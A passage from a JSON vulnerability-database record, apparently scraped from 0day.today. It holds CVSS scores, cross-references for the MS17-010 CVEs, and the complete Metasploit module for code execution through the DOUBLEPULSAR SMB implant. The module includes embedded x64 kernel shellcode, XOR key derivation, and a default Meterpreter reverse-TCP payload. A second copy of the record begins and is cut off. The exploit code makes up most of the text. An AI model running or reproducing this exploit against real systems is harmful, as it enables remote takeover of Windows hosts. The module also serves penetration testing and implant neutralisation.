"COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", 
"CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-01T16:39:33", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:42031"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", 
"SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", 
"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2020-02-05T00:47:44", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2020-02-05T00:47:44", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 
'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar 
knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence 
if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant 
neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n 
pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n 
\"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n 
\"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-01] #"}, "lastseen": "2021-09-01T16:39:33", 
"differentElements": ["sourceData"], "edition": 3}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "cc304501a1ed9ea1761fd56a0fa578b9", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-09-01T22:14:48", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": 
["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142603", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "700099.PRM", 